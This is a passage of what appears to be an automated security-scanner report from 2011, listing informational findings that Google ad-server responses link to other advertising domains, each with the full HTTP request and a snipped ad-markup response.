<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/CTSSportWagon%26adT%3D2011%2BCTS%2BSport%2BWagon%26adU%3DMBUSA.com/CPO%26adT%3DCertified%2BPre-Owned%2BEvent%26adU%3DAutoInsurance.Insure.com%26adT%3DMercedes%2BInsurance%2BRates%26adU%3Dwww.CarMax.com%26adT%3DUsed%2BMercedes%2BS550%26adU%3DMercedesHouseNY.com%26adT%3DMercedes%2BHouse%26gl%3DUS&amp;usg=AFQjCNHi9MgHTs-sf4vNFGXmm_k_K5GElA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.324. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680115&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662115940&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662115951&frm=1&adk=2614322350&ga_vid=179388893.1303662116&ga_sid=1303662116&ga_hid=1632567695&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:21:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.SabrinaBrazilTravel.com%26adT%3DAmazon%2BRainforest%2BTours%26adU%3Dwww.mturk.com/solution_provider.com%26adT%3DCrowdControl%26adU%3DAmazon_Kindle.BigDeal.com%26adT%3DKindles%2BBlowout%2B-%2B93%2525%2BOff%26gl%3DUS&amp;usg=AFQjCNHqAki6ob4pzKliGopXb2PtfeN9jQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.325. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658421793&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658421823&frm=1&adk=513358139&ga_vid=1010912121.1303658422&ga_sid=1303658422&ga_hid=1198805571&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=35 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4313

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_728_90_a.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dealfind.com/Chicago%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGiI2Z2ATfFmorWcGQXn9TOGf1nlg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.326. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676516&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658516462&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658516467&frm=1&adk=2614322350&ga_vid=1758961832.1303658516&ga_sid=1303658516&ga_hid=2008436335&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1368

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RES95J3Zo_918427505.html?rtbhost=rts-rr18.sldc.dataxu.net&btid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzN8R0Y2VkdlZW5ncnwxMzAzNjU4NTE1NTAxfDF8MEZNQXp6YTk2dHwwUkVTOTVKM1pvfEVYXzEwMjM0NzcyMDZ8ODY2NDgz&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRAEQAHP6EK5X5HHeFjM058SIacGTDQNRf0Tg&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZNQXp6YTk2dA&ciu=MFJFUzk1SjNabw&reqid=NERCNDQwMTEwMDA3M0ZBMTBBRTU3RTQ3MURFMTYzMzM&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=866&zc=NzUyMDc&v=0&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.327. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303683796&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html&dt=1303665796074&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303665796079&frm=0&adk=1607234649&ga_vid=1626335166.1303665796&ga_sid=1303665796&ga_hid=1541484323&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&fu=0&ifi=1&dtd=8&xpc=7bb21vxXD3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:23:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-ghdb-cross-site-scripting-example-poc-report-kroogycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dvulnerability.management.qualys.com%26adT%3DWireless%2BVulnerability%26adU%3Dwww.realtech.com%26adT%3DS-A-P%2BLinux%2BMigration%26gl%3DUS&amp;usg=AFQjCNF7a3hqafJL_mjUYBRtA47xeOOguw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.328. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:26:12 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.329. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681111&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663111921&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663111933&frm=1&adk=2614322350&ga_vid=190947724.1303663112&ga_sid=1303663112&ga_hid=1728062786&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:38:29 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15066

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3DMoreBarStools.com%26adT%3DTop%2BBar%2BStools%2BOn%2BSale%26adU%3Dwww.proaudiostash.com%26adT%3D19%2526quot%253B%2BLaptop%2BDrawer%26gl%3DUS&amp;usg=AFQjCNHD5WOLJmDEI6hItJKL7rmAoIzVeA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.330. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679721&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661721573&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661721579&frm=1&adk=2614322350&ga_vid=1108700530.1303661722&ga_sid=1303661722&ga_hid=830227066&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:15:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25474489&ahcid=640462&bimpd=xlVLSeu1BUuJnSQwIvc_dqylfiPNl13aGcShyF5znv6QsyY6B_3DClLdxxpKZdGfOaqIO6otpN5tHEP5lF3I1q9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BH3iX1ZfkEPugt72CmK04CyGDOWIWwtpfKu6Yb9nPGUMhtlfbsVT-wOwKJBNR3jwWTazV0AvbMQZNLntaOeKl1p3e0zVN6loNyK4c_OoCgom8jpD4tX7Nxwn2-BtKmkq7LmKEOeK4ZAoWfwI8SCWgb1j-Ezh3q9PALHUe6oayQIztC8cnfVoc-ffY0bjr9ypPr7vVxLo4SQGNqr6znxbeBigsLTxdpnye91zCQ7JsBxbrg3DoDCmL2ffRtSVuJNqJgaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeuZcgF_uJfsdRlJrg2l5qBJ5nm0lTjSklndxOrj4-IjIX91mNtx9s8FQapZIbkQ1tNBrIEGL6Qi9P13I5nx5nfpqw7-gXJrOTXQhp_NHN0hzH3NngsQiO9YMiN-l9OgnK6Lhd38O4b4WbBWengTve4vt_T370WDWWY1SqEwEJwbhoHTLamDrAmQq2DYIVNCf6VQGYjf1QW3f3F61FH8ZW8ZA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRMlgAJjdMK5TsNMMwkwsaawzpsWJ7Nc8s9gw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKdS2lky0TdObJo32lAfCybCGA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAbClYHu9567sukB%26num%3D1%26sig%3DAGiWqtyrryr04rkA9J_KR2KaKHqr9794Nw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.331. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 12:29:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3062

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
